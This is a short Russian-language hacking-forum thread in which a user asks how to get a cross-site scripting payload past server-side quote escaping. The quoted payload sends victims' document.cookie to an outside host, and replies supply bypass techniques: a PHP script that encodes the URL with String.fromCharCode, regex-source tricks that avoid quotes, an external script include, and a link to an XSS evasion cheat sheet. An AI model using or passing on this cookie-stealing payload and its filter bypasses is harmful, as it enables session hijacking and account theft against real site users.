Кидаю в болталку, т.к. тема примитивная ИМХО :rolleyes:
Ну в общем на серваке экранирование и жаваскрипт типа
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
превратится в
<script>img = new Image(); img.src = \"http://old.antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
и работать небудет, чё делать? :rolleyes:
Те кто знают JS спокойно решают эту проблему, а я без понятия, гуглил, ничё не нащёл...

Закодируй в чаркоды

Чёто как-то нет такой функции как я понял из ошибки жаваскрипта...
Но ход мысли я понял... Хмм... Ану щас попробую ord()+ord()+... моджет получится :)
Да в нём и функции ord штоле нету.... :mad:

Короче пойду я втыкать это хреново шифрование, спасибо

Погуглив догнал, вот сбацал скрипт, может кому надо будет
<?php
$s = 'http://old.antichat.ru/cgi-bin/s.jpg?';
$ord = array();
for($i=0;$i<strlen($s);$i++) {
$ord[] = ord($s[$i]);
}
$ord = implode(',',$ord);
echo "String.fromCharCode($ord)";
?>

/строка/.source;
/строка/.toString().slice(1, -1);

P.S.
<script src=http://whatever></script>

инклуд юзай.
и вообще на вот почитай: _http://ha.ckers.org/xss.html